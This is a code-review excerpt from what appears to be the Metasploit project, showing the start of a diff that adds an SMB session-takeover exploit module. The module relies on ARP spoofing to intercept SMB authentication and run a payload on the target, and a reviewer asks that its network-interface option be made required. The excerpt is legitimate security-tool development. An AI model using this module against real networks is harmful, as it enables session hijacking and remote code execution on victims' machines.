modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -0,0 +1,649 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Capture
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows SMB Direct Session Takeover',
+      'Description'    => %q{
+          This module will intercept direct SMB authentication requests to
+        another host, gaining access to an authenticated SMB session if
+        successful. If the connecting user is an administrator and network
+        logins are allowed to the target machine, this module will execute an
+        arbitrary payload. To exploit this, the target system must try to
+        autheticate to another host on the local area network.
+
+        SMB Direct Session takeover is a combination of previous attacks.
+
+        This module is dependent on an external ARP spoofer. The builtin ARP
+        spoofer was not providing sufficient host discovery. Bettercap v1.6.2
+        was used during the development of this module.
+
+        The original SMB relay attack was first reported by Sir Dystic on March
+        31st, 2001 at @lanta.con in Atlanta, Georgia.
+      },
+      'Author'         =>
+        [
+          'usiegl00'
+        ],
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true,
+          'StackAdjustment' => -3500,
+        },
+      'References'     =>
+        [
+            [ 'URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack' ]
+        ],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DisclosureDate' => '2021-02-16',
+      'DefaultTarget' => 0 ))
+
+    register_options(
+      [
+        OptString.new('SHARE',    [ true, "The share to connect to", 'ADMIN$' ])
+        # For future cross LAN work:
+        #OptString.new('GATEWAY',  [ true, "The network gateway ip address" ])
+      ])
+
+    deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','SECRET','GATEWAY_PROBE_HOST','GATEWAY_PROBE_PORT','TIMEOUT')
+  end
+
+  def exploit
+    print_good("INFO : Warming up...")
+    print_error("WARNING : Not running as Root. This can cause socket permission issues.") unless Process.uid == 0
+    @sessions = {}
+    @main_threads = []
+    @interface = datastore['INTERFACE'] || Pcap.lookupdev
```

Comment:
I'd be in favor of not defaulting the interface here, and marking as explicitly required within the module options, just to remove any unexpected behavior:

```ruby
    register_options(
      [
        OptString.new('SHARE',    [ true, "The share to connect to", 'ADMIN$' ]),
        OptString.new('INTERFACE', [true, 'The name of the interface']),
```